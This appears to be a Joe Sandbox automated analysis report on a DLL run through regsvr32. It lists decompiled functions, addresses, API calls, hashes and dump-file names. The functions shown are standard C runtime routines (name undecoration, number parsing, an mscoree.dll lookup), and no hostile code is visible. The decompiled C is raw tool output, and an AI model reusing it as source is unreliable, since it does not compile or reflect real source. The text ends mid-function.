0x7ffd2b07969b
0x7ffd2b07969d
0x7ffd2b0796a4
0x7ffd2b0796ac
0x7ffd2b0796b4
0x7ffd2b0796b7
0x7ffd2b0796bb
0x7ffd2b0796c2
0x7ffd2b0796c4
0x7ffd2b0796ce
0x7ffd2b0796d0
0x7ffd2b0796d3
0x7ffd2b0796d3
0x7ffd2b0796d7
0x7ffd2b0796dc
0x7ffd2b0796e5
0x7ffd2b0796ec
0x7ffd2b0796ee
0x7ffd2b0796f1
0x7ffd2b0796f4
0x7ffd2b0796f7
0x7ffd2b0796f9
0x7ffd2b0796fc
0x7ffd2b079702
0x7ffd2b079704
0x7ffd2b079706
0x7ffd2b079709
0x7ffd2b07970f
0x7ffd2b079711
0x7ffd2b079716
0x7ffd2b079718
0x7ffd2b07971c
0x7ffd2b07971e
0x7ffd2b079722
0x7ffd2b079727
0x7ffd2b07972e
0x7ffd2b079732
0x7ffd2b079743

APIs

_errno.LIBCMT ref: 00007FFD2B079691
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B07969D
_errno.LIBCMT ref: 00007FFD2B0796C4

Strings

1, xrefs: 00007FFD2B079713

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID: 1
API String ID: 2819658684-2212294583
Opcode ID: 98b6736d22ec9c38237573216724a09e87e3c7d5bbbaa4ae57ddbb29dd16388b
Instruction ID: 8d275143203deda752b8d0189b9f8de2cf858730b78651208f1e45bded0c2283
Opcode Fuzzy Hash: 98b6736d22ec9c38237573216724a09e87e3c7d5bbbaa4ae57ddbb29dd16388b
Instruction Fuzzy Hash: 8521A421F1F2C6AAF7178F288A2427C9A94DF5B740F99C031D709062A3DEADA940F751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06B1D4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00007FFD7FFD2B06B1D4(void* __ecx, void* __edx, void* __esi, void* __rax, void* __rcx, void* __rsi, void* __r8) {
				char _v24;
				void* __rbx;
				void* _t5;
				void* _t7;
				void* _t12;
				void* _t14;
				void* _t21;
				void* _t24;
				void* _t25;
				char* _t26;

				_t22 = __rsi;
				_t12 = __rax;
				_t7 = __edx;
				asm("movups xmm0, [edx]");
				_t14 = __rcx;
				asm("movdqu [ecx], xmm0");
				E00007FFD7FFD2B06AFE0(__ecx, __esi, __rax, __rcx, __rcx, "{for ", __rsi, __r8);
				E00007FFD7FFD2B06E6CC(_t7, __esi, _t14,  &_v24, _t21, _t22, __r8, _t24, _t25);
				E00007FFD7FFD2B06AC78(_t12, _t14, _t12);
				_t5 = E00007FFD7FFD2B06AF5C(0x7d, __esi, _t12, _t14, _t14, _t22, __r8);
				_t26 =  *0x2b0c9a70; // 0x0
				if ( *_t26 != 0x40) goto 0x2b06b226;
				 *0x2b0c9a70 = _t26 + 1;
				return _t5;
			}

0x7ffd2b06b1d4
0x7ffd2b06b1d4
0x7ffd2b06b1d4
0x7ffd2b06b1da
0x7ffd2b06b1e4
0x7ffd2b06b1e7
0x7ffd2b06b1eb
0x7ffd2b06b1f5
0x7ffd2b06b200
0x7ffd2b06b20a
0x7ffd2b06b20f
0x7ffd2b06b21a
0x7ffd2b06b21f
0x7ffd2b06b22e

APIs

DName::operator+=.LIBCMT ref: 00007FFD2B06B1EB

Part of subcall function 00007FFD2B06AFE0: DName::operator=.LIBCMT ref: 00007FFD2B06B00B

Part of subcall function 00007FFD2B06E6CC: DName::DName.LIBCMT ref: 00007FFD2B06E74C
Part of subcall function 00007FFD2B06E6CC: DName::operator+=.LIBCMT ref: 00007FFD2B06E760
Part of subcall function 00007FFD2B06E6CC: DName::DName.LIBCMT ref: 00007FFD2B06E77B
Part of subcall function 00007FFD2B06E6CC: DName::operator+=.LIBCMT ref: 00007FFD2B06E791
Part of subcall function 00007FFD2B06E6CC: DName::DName.LIBCMT ref: 00007FFD2B06E7FE
Part of subcall function 00007FFD2B06E6CC: DName::operator+=.LIBCMT ref: 00007FFD2B06E816
Part of subcall function 00007FFD2B06E6CC: DName::operator+=.LIBCMT ref: 00007FFD2B06E82C
Part of subcall function 00007FFD2B06E6CC: DName::operator+=.LIBCMT ref: 00007FFD2B06E842
Part of subcall function 00007FFD2B06E6CC: UnDecorator::getZName.LIBCMT ref: 00007FFD2B06E860

DName::operator+=.LIBCMT ref: 00007FFD2B06B200
DName::operator+=.LIBCMT ref: 00007FFD2B06B20A

Part of subcall function 00007FFD2B06AF5C: DName::doPchar.LIBCMT ref: 00007FFD2B06AF9A

Strings

{for , xrefs: 00007FFD2B06B1DD

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$Name$Name::$Decorator::getName::doName::operator=Pchar
String ID: {for
API String ID: 1290961062-864106941
Opcode ID: 26711504c110b420eeea02d5d788ca6692a628dbfd78d0615118f93bdd6e123f
Instruction ID: c401b06ce4709f38a416b67859610c004d069c6b9585a05b155ea5cb1f328a9f
Opcode Fuzzy Hash: 26711504c110b420eeea02d5d788ca6692a628dbfd78d0615118f93bdd6e123f
Instruction Fuzzy Hash: 67F0A791F1A60784EA03AB22AD2307863106F57780F445430EE5E0A2B2DFBCE582A384

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B066ED0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,000000FF,00007FFD2B066F19,?,?,00000000,00007FFD2B06962E,?,?,?,00007FFD2B0696FB), ref: 00007FFD2B066EDF
GetProcAddress.KERNEL32(?,?,000000FF,00007FFD2B066F19,?,?,00000000,00007FFD2B06962E,?,?,?,00007FFD2B0696FB), ref: 00007FFD2B066EF4

Strings

CorExitProcess, xrefs: 00007FFD2B066EEA
mscoree.dll, xrefs: 00007FFD2B066ED8

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: 66ac55ddac3b015a9f28852b454fc3581cf5d3fbe873153d3e3725eb55b56a6e
Instruction ID: c08d7eb4074d10427ecc7965fe64767ae644740a0fffe0c6c830bb9e71458d78
Opcode Fuzzy Hash: 66ac55ddac3b015a9f28852b454fc3581cf5d3fbe873153d3e3725eb55b56a6e
Instruction Fuzzy Hash: 2AE0EC11F0BA0241FE1B5BA1AD7517412D09F5EB10B485438C55E063B1DEACAE99D690

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B066B9C Relevance: 6.2, APIs: 4, Instructions: 195
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E00007FFD7FFD2B066B9C(void* __eflags, signed long long __rax, long long __rbx, void* __rcx, long long __rdx, long long* __r8, long long _a8, long long _a16, signed int _a40) {
				char _v64;
				intOrPtr _v72;
				char _v88;
				void* _t41;
				signed short _t65;
				signed short _t67;
				void* _t100;
				signed int _t106;
				signed long long _t117;
				signed long long _t118;
				signed short* _t122;
				signed short* _t124;
				signed long long _t139;
				void* _t140;
				void* _t145;
				long long _t154;
				signed long long _t155;

				_t117 = __rax;
				_a8 = __rbx;
				_a16 = __rdx;
				r12d = r9d;
				E00007FFD7FFD2B066AE4(__rax,  &_v88, __rcx);
				r15d = 0;
				if (__r8 == 0) goto 0x2b066bd7;
				 *__r8 = __rdx;
				if (__rdx != 0) goto 0x2b066bf1;
				E00007FFD7FFD2B067698(_t117);
				 *_t117 = 0x16;
				E00007FFD7FFD2B069444();
				goto 0x2b066df0;
				if (r12d == 0) goto 0x2b066c02;
				if (r12d - 2 < 0) goto 0x2b066bdc;
				if (r12d - 0x24 > 0) goto 0x2b066bdc;
				_t139 = _t155;
				_t122 = __rdx + 2;
				goto 0x2b066c1b;
				_t65 =  *_t122 & 0x0000ffff;
				_t123 =  &(_t122[1]);
				if (E00007FFD7FFD2B07064C(_t65 & 0x0000ffff, 8,  &_v88) != 0) goto 0x2b066c14;
				if (_t65 != 0x2d) goto 0x2b066c3b;
				goto 0x2b066c41;
				if (_t65 != 0x2b) goto 0x2b066c48;
				_t124 =  &(_t122[2]);
				if (r12d < 0) goto 0x2b066de7;
				if (r12d == 1) goto 0x2b066de7;
				if (r12d - 0x24 > 0) goto 0x2b066de7;
				if (r12d != 0) goto 0x2b066c98;
				if (E00007FFD7FFD2B0704B4( *_t123 & 0xffff) == 0) goto 0x2b066c7e;
				r12d = 0xa;
				goto 0x2b066cbe;
				if ( *_t124 == 0x78) goto 0x2b066c92;
				if ( *_t124 == 0x58) goto 0x2b066c92;
				r12d = 8;
				goto 0x2b066cbe;
				r12d = 0x10;
				if (r12d != 0x10) goto 0x2b066cbe;
				if (E00007FFD7FFD2B0704B4( *_t123 & 0xffff) != 0) goto 0x2b066cbe;
				if ( *_t124 == 0x78) goto 0x2b066cb6;
				if ( *_t124 != 0x58) goto 0x2b066cbe;
				_t67 = _t124[1] & 0x0000ffff;
				_t118 = _t117 | 0xffffffff;
				_t41 = E00007FFD7FFD2B0704B4(_t67 & 0x0000ffff);
				r11d = _t41;
				if (_t41 != 0xffffffff) goto 0x2b066d0c;
				if (0x41 - _t67 > 0) goto 0x2b066cf0;
				if (_t67 - 0x5a <= 0) goto 0x2b066cf9;
				if (_t145 - 0x61 - 0x19 > 0) goto 0x2b066d2b;
				if (_t145 - 0x61 - 0x19 > 0) goto 0x2b066d08;
				r11d = _t118 - 0x37;
				if (r11d - r12d >= 0) goto 0x2b066d2b;
				_t100 = _t139 - _t118;
				if (_t100 < 0) goto 0x2b066d48;
				if (_t100 != 0) goto 0x2b066d23;
				if (_t118 - __rcx <= 0) goto 0x2b066d48;
				if (__r8 != 0) goto 0x2b066d55;
				_t154 = _a16;
				if ((bpl & 0x00000008) != 0) goto 0x2b066d61;
				_t127 =  !=  ? _t154 :  &(_t124[2]) - 2;
				goto 0x2b066dbd;
				_t140 = _t139 + r12d * _t139;
				goto 0x2b066cd0;
				if ((bpl & 0x00000004) != 0) goto 0x2b066d96;
				_t106 = bpl & 0x00000001;
				if (_t106 != 0) goto 0x2b066dbd;
				if (_t106 == 0) goto 0x2b066d8d;
				if (_t140 - 0 > 0) goto 0x2b066d96;
				if (((_a40 | 0xe) & 0x00000002) != 0) goto 0x2b066dbd;
				if (_t140 - 0xffffffff <= 0) goto 0x2b066dbd;
				E00007FFD7FFD2B067698(_t118);
				 *_t118 = 0x22;
				if ((bpl & 0x00000001) == 0) goto 0x2b066dad;
				goto 0x2b066dbd;
				asm("dec eax");
				if (__r8 == 0) goto 0x2b066dc6;
				 *__r8 = ( !=  ? _t154 :  &(_t124[2]) - 2) + 2;
				if ((bpl & 0x00000002) == 0) goto 0x2b066dcf;
				if (_v64 == 0) goto 0x2b066de2;
				 *(_v72 + 0xc8) =  *(_v72 + 0xc8) & 0xfffffffd;
				goto 0x2b066e05;
				if (__r8 == 0) goto 0x2b066df0;
				 *__r8 = _t154;
				if (_v64 == r15b) goto 0x2b066e03;
				 *(_v72 + 0xc8) =  *(_v72 + 0xc8) & 0xfffffffd;
				return 0;
			}

0x7ffd2b066b9c
0x7ffd2b066b9c
0x7ffd2b066ba1
0x7ffd2b066bc0
0x7ffd2b066bc6
0x7ffd2b066bcb
0x7ffd2b066bd1
0x7ffd2b066bd3
0x7ffd2b066bda
0x7ffd2b066bdc
0x7ffd2b066be1
0x7ffd2b066be7
0x7ffd2b066bec
0x7ffd2b066bf4
0x7ffd2b066bfa
0x7ffd2b066c00
0x7ffd2b066c06
0x7ffd2b066c09
0x7ffd2b066c12
0x7ffd2b066c14
0x7ffd2b066c17
0x7ffd2b066c27
0x7ffd2b066c34
0x7ffd2b066c39
0x7ffd2b066c3f
0x7ffd2b066c44
0x7ffd2b066c4b
0x7ffd2b066c55
0x7ffd2b066c5f
0x7ffd2b066c68
0x7ffd2b066c74
0x7ffd2b066c76
0x7ffd2b066c7c
0x7ffd2b066c82
0x7ffd2b066c88
0x7ffd2b066c8a
0x7ffd2b066c90
0x7ffd2b066c92
0x7ffd2b066c9c
0x7ffd2b066ca8
0x7ffd2b066cae
0x7ffd2b066cb4
0x7ffd2b066cb6
0x7ffd2b066cc3
0x7ffd2b066cd3
0x7ffd2b066cd8
0x7ffd2b066cde
0x7ffd2b066ce8
0x7ffd2b066cee
0x7ffd2b066cf7
0x7ffd2b066d03
0x7ffd2b066d08
0x7ffd2b066d0f
0x7ffd2b066d14
0x7ffd2b066d17
0x7ffd2b066d19
0x7ffd2b066d21
0x7ffd2b066d29
0x7ffd2b066d2b
0x7ffd2b066d3b
0x7ffd2b066d40
0x7ffd2b066d46
0x7ffd2b066d52
0x7ffd2b066d5c
0x7ffd2b066d6f
0x7ffd2b066d71
0x7ffd2b066d75
0x7ffd2b066d7c
0x7ffd2b066d8b
0x7ffd2b066d8f
0x7ffd2b066d94
0x7ffd2b066d96
0x7ffd2b066d9b
0x7ffd2b066da5
0x7ffd2b066dab
0x7ffd2b066db4
0x7ffd2b066dc0
0x7ffd2b066dc2
0x7ffd2b066dca
0x7ffd2b066dd4
0x7ffd2b066ddb
0x7ffd2b066de5
0x7ffd2b066dea
0x7ffd2b066dec
0x7ffd2b066df5
0x7ffd2b066dfc
0x7ffd2b066e1c

APIs

Part of subcall function 00007FFD2B066AE4: _getptd.LIBCMT ref: 00007FFD2B066AF6

_errno.LIBCMT ref: 00007FFD2B066BDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B066BE7
iswctype.LIBCMT ref: 00007FFD2B066C20
_errno.LIBCMT ref: 00007FFD2B066D96

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _errno$_getptd_invalid_parameter_noinfoiswctype
String ID:
API String ID: 2104083562-0
Opcode ID: af032c57f517698ef8f18db5f09aed04e3dcf08fc8bf4856ebadedf53158825d
Instruction ID: 93b72fc0c0cd2b23b6256aa933bfdb8b574da0f999dc91d2ce5505b0e298cfa4
Opcode Fuzzy Hash: af032c57f517698ef8f18db5f09aed04e3dcf08fc8bf4856ebadedf53158825d
Instruction Fuzzy Hash: C4619452F0A55248FBB65B958E273FA6180AF427B4F144231DE69061E5EEFCEC84B381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06E43C Relevance: 6.2, APIs: 4, Instructions: 169
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E00007FFD7FFD2B06E43C(void* __esi, void* __eflags, long long __rbx, signed long long* __rcx, void* __rdx, void* __rdi, long long __rsi, void* __r8, void* __r10, void* __r11, long long _a8, signed int _a16, signed int _a24, long long _a32) {
				char _v24;
				signed int _v32;
				signed long long _v40;
				unsigned int _v48;
				char _v56;
				signed int _t47;
				void* _t61;
				void* _t62;
				signed int _t74;
				void* _t76;
				signed int _t79;
				signed int _t80;
				long long _t87;
				void* _t105;
				intOrPtr* _t106;
				intOrPtr* _t107;
				long long _t109;
				long long _t110;
				char* _t111;
				char* _t112;
				char* _t113;
				signed long long* _t116;
				void* _t146;
				void* _t147;

				_t146 = __r11;
				_t145 = __r10;
				_t144 = __r8;
				_t138 = __rsi;
				_t137 = __rdi;
				_t131 = __rdx;
				_t77 = __esi;
				_a8 = __rbx;
				_a32 = __rsi;
				_t47 =  *0x2b0c9a8c; // 0x0
				_t116 = __rcx;
				asm("bt eax, 0xd");
				if (__eflags >= 0) goto 0x2b06e487;
				asm("btr eax, 0xd");
				 *0x2b0c9a8c = _t47;
				E00007FFD7FFD2B07027C(_t61, _t62, 0, _t76, __esi, __eflags, _t105, __rcx,  &_v24, __rdx, __rdi, __rsi, __r8, __r10, _t147);
				asm("bts dword [0x5b612], 0xd");
				asm("movups xmm0, [ebp-0x10]");
				asm("movdqu [ebx], xmm0");
				goto 0x2b06e6b6;
				_t106 =  *0x2b0c9a70; // 0x0
				if ( *_t106 != 0x3f) goto 0x2b06e6a5;
				_t107 = _t106 + 1;
				 *0x2b0c9a70 = _t107;
				if ( *_t107 != 0x3f) goto 0x2b06e4f7;
				if ( *((intOrPtr*)(_t107 + 1)) != 0x3f) goto 0x2b06e4d2;
				E00007FFD7FFD2B06E43C(__esi,  *((intOrPtr*)(_t107 + 1)) - 0x3f, _t116,  &_v24, _t131, __rdi, __rsi, __r8, __r10, _t146);
				_t109 =  *0x2b0c9a70; // 0x0
				goto 0x2b06e4cb;
				_t110 = _t109 + 1;
				 *0x2b0c9a70 = _t110;
				if ( *_t110 != 0) goto 0x2b06e4c1;
				goto 0x2b06e47a;
				if ( *_t110 != 0x24) goto 0x2b06e4e4;
				E00007FFD7FFD2B06CF0C( *_t106, 1, _t116,  &_v56, _t131, __rdi, _t138, __r10, _t146);
				goto 0x2b06e505;
				r8d = 0;
				 *0x2b0c9a70 = _t110;
				E00007FFD7FFD2B06C7D0(0, _t116,  &_v56, _t137, _t138, _t144, __r10, _t146);
				goto 0x2b06e505;
				r8d = 0;
				E00007FFD7FFD2B06D0E0( *_t106, 1, _t77, _t116,  &_v56, _t137, _t138, _t144, __r10, _t146);
				_t87 = _v56;
				if (_t87 == 0) goto 0x2b06e51e;
				asm("bt esi, 0x9");
				if (_t87 >= 0) goto 0x2b06e51e;
				_a24 = 1;
				goto 0x2b06e522;
				_a24 = _a24 & 0x00000000;
				_a16 = _v48 >> 0x0000000f & 0x00000001;
				if (_v48 - 1 <= 0) goto 0x2b06e53c;
				asm("movaps xmm0, [ebp-0x30]");
				goto 0x2b06e47e;
				_t111 =  *0x2b0c9a70; // 0x0
				if ( *_t111 == 0) goto 0x2b06e5fd;
				if ( *_t111 == 0x40) goto 0x2b06e5fd;
				E00007FFD7FFD2B06E6CC(1, _v48, _t116,  &_v40, _t137, _t138, _t144, _t145, _t146);
				if (_v40 == 0) goto 0x2b06e5fa;
				if ( *0x2b0c9a98 == 0) goto 0x2b06e5c3;
				asm("movaps xmm0, [ebp-0x30]");
				 *0x2b0c9a98 = 0;
				asm("movdqa [ebp-0x10], xmm0");
				E00007FFD7FFD2B06AC78(_t111,  &_v24,  &_v40);
				_t112 =  *0x2b0c9a70; // 0x0
				asm("movaps xmm5, [ebp-0x10]");
				asm("movdqa [ebp-0x30], xmm5");
				if ( *_t112 == 0x40) goto 0x2b06e5f7;
				E00007FFD7FFD2B06E6CC(1, _v48, _t116,  &_v24, _t137, _t138, _t144, _t145, _t146);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x20], xmm0");
				asm("movups xmm1, [eax]");
				asm("movdqu [ebp-0x10], xmm1");
				goto 0x2b06e5cc;
				asm("movaps xmm0, [ebp-0x20]");
				asm("movdqa [ebp-0x10], xmm0");
				E00007FFD7FFD2B06AFE0(_v48 >> 0x0000000f & 0x00000001, _v48, _t112, _t116,  &_v24, "::", _t138, _t144);
				asm("movaps xmm5, [ebp-0x10]");
				asm("movdqa [ebp-0x10], xmm5");
				E00007FFD7FFD2B06AC78(_t112,  &_v24,  &_v56);
				asm("movaps xmm5, [ebp-0x10]");
				asm("movdqa [ebp-0x30], xmm5");
				_t79 = _v48;
				_t74 = _a24;
				if (_t74 == 0) goto 0x2b06e612;
				if (_v56 == 0) goto 0x2b06e612;
				asm("bts esi, 0x9");
				_v48 = _t79;
				r8d = 0x8000;
				if (_a16 == 0) goto 0x2b06e622;
				_t80 = _t79 | r8d;
				_v48 = _t80;
				if (_v56 == 0) goto 0x2b06e533;
				if ((0x00001000 & _t80) != 0) goto 0x2b06e533;
				_t113 =  *0x2b0c9a70; // 0x0
				if ( *_t113 == 0) goto 0x2b06e663;
				if ( *_t113 == 0x40) goto 0x2b06e65c;
				_t116[1] = _t116[1] & 0xffff00ff;
				 *_t116 =  *_t116 & 0x00000000;
				_t116[1] = 2;
				goto 0x2b06e6b6;
				 *0x2b0c9a70 =  *0x2b0c9a70 + 1;
				if (( *0x2b0c9a8c & 0x00001000) == 0) goto 0x2b06e697;
				if (_t74 != 0) goto 0x2b06e697;
				if ((r8d & _t80) != 0) goto 0x2b06e697;
				_v40 = _v40 & 0x00000000;
				_v32 = _v32 & 0xffff0000;
				E00007FFD7FFD2B06D720(_t116,  &_v24,  &_v40, _t144, _t145, _t146);
				asm("movaps xmm5, [ebp-0x30]");
				asm("movdqu [ebx], xmm5");
				goto 0x2b06e6b6;
				E00007FFD7FFD2B06D720(_t116, _t116,  &_v56, _t144, _t145, _t146);
				goto 0x2b06e6b6;
				if (0x1000 != 0) goto 0x2b06e64b;
				return E00007FFD7FFD2B06A490(1, _t113, _t116);
			}

0x7ffd2b06e43c
0x7ffd2b06e43c
0x7ffd2b06e43c
0x7ffd2b06e43c
0x7ffd2b06e43c
0x7ffd2b06e43c
0x7ffd2b06e43c
0x7ffd2b06e43c
0x7ffd2b06e441
0x7ffd2b06e44e
0x7ffd2b06e454
0x7ffd2b06e457
0x7ffd2b06e45b
0x7ffd2b06e45d
0x7ffd2b06e467
0x7ffd2b06e46d
0x7ffd2b06e472
0x7ffd2b06e47a
0x7ffd2b06e47e
0x7ffd2b06e482
0x7ffd2b06e487
0x7ffd2b06e494
0x7ffd2b06e49a
0x7ffd2b06e49d
0x7ffd2b06e4a6
0x7ffd2b06e4ad
0x7ffd2b06e4b3
0x7ffd2b06e4b8
0x7ffd2b06e4bf
0x7ffd2b06e4c1
0x7ffd2b06e4c4
0x7ffd2b06e4ce
0x7ffd2b06e4d0
0x7ffd2b06e4d9
0x7ffd2b06e4dd
0x7ffd2b06e4e2
0x7ffd2b06e4e4
0x7ffd2b06e4e9
0x7ffd2b06e4f0
0x7ffd2b06e4f5
0x7ffd2b06e4fb
0x7ffd2b06e500
0x7ffd2b06e505
0x7ffd2b06e50d
0x7ffd2b06e50f
0x7ffd2b06e513
0x7ffd2b06e515
0x7ffd2b06e51c
0x7ffd2b06e51e
0x7ffd2b06e52e
0x7ffd2b06e531
0x7ffd2b06e533
0x7ffd2b06e537
0x7ffd2b06e53c
0x7ffd2b06e546
0x7ffd2b06e54f
0x7ffd2b06e559
0x7ffd2b06e563
0x7ffd2b06e574
0x7ffd2b06e576
0x7ffd2b06e57e
0x7ffd2b06e585
0x7ffd2b06e58a
0x7ffd2b06e58f
0x7ffd2b06e596
0x7ffd2b06e59d
0x7ffd2b06e5a2
0x7ffd2b06e5a8
0x7ffd2b06e5b1
0x7ffd2b06e5b4
0x7ffd2b06e5b9
0x7ffd2b06e5bc
0x7ffd2b06e5c1
0x7ffd2b06e5c3
0x7ffd2b06e5c7
0x7ffd2b06e5d3
0x7ffd2b06e5e0
0x7ffd2b06e5e4
0x7ffd2b06e5e9
0x7ffd2b06e5ee
0x7ffd2b06e5f2
0x7ffd2b06e5f7
0x7ffd2b06e5fd
0x7ffd2b06e602
0x7ffd2b06e609
0x7ffd2b06e60b
0x7ffd2b06e60f
0x7ffd2b06e612
0x7ffd2b06e61a
0x7ffd2b06e61c
0x7ffd2b06e61f
0x7ffd2b06e627
0x7ffd2b06e634
0x7ffd2b06e63a
0x7ffd2b06e644
0x7ffd2b06e649
0x7ffd2b06e64b
0x7ffd2b06e652
0x7ffd2b06e656
0x7ffd2b06e65a
0x7ffd2b06e65c
0x7ffd2b06e669
0x7ffd2b06e66d
0x7ffd2b06e672
0x7ffd2b06e674
0x7ffd2b06e679
0x7ffd2b06e688
0x7ffd2b06e68d
0x7ffd2b06e691
0x7ffd2b06e695
0x7ffd2b06e69e
0x7ffd2b06e6a3
0x7ffd2b06e6a7
0x7ffd2b06e6c8

APIs

UnDecorator::getZName.LIBCMT ref: 00007FFD2B06E500
DName::operator+=.LIBCMT ref: 00007FFD2B06E58A
DName::operator+=.LIBCMT ref: 00007FFD2B06E5D3
DName::operator+=.LIBCMT ref: 00007FFD2B06E5E9

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$Decorator::getName
String ID:
API String ID: 3826463593-0
Opcode ID: 21c3e6f6eb3fdf3c1a5089ebda31f20f98ff603de8859b3de623c28833d96c97
Instruction ID: 18301a935650a430d410ac7663c3d57adeabc9f451c2988a7c9c3d3491eb86a5
Opcode Fuzzy Hash: 21c3e6f6eb3fdf3c1a5089ebda31f20f98ff603de8859b3de623c28833d96c97
Instruction Fuzzy Hash: F8819D22F1A7628CFB138B64CD623BC2760BB56748F444534DA4E16AE9DFBCA440E7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0668D4 Relevance: 6.2, APIs: 4, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00007FFD7FFD2B0668D4(intOrPtr* __rax, long long __rbx, long long __rcx, long long* __rdx, long long _a8, long long _a24) {
				signed int _t29;
				signed int _t30;
				void* _t38;
				signed int _t56;
				signed short _t62;
				signed short _t64;
				void* _t93;
				signed int _t99;
				intOrPtr* _t106;
				signed short* _t108;
				signed short* _t109;
				signed short* _t110;
				void* _t118;
				void* _t119;
				long long* _t123;

				_t106 = __rax;
				_a24 = __rbx;
